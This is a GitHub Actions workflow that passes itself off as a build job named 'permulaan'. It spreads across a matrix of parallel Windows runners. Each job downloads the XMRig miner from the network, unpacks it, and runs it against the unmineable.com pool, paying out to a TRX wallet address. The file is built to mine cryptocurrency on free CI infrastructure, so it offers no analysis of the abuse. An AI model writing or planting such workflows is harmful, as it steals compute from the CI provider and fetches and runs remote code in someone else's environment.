name: permulaan

on: [workflow_dispatch]

jobs:
  build:
    name: permulaan
    runs-on: windows-latest
    strategy:
      max-parallel: 9
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest http://github.com/xmrig/xmrig/releases/download/v6.15.0/xmrig-6.15.0-msvc-win64.zip -OutFile xmrig-6.15.0-msvc-win64.zip
    - name: Extract
      run: Expand-Archive xmrig-6.15.0-msvc-win64.zip
    - name: RUNNING
      run: .\xmrig-6.15.0-msvc-win64\xmrig-6.15.0\xmrig.exe -o rx.unmineable.com:3333 -a rx -k -u TRX:TGJKT2eTvqTHQ4yQqJeaiKGFr3Rh4PpMcT.permulaan -p x -t 2


    - name: DONE
      run: exit
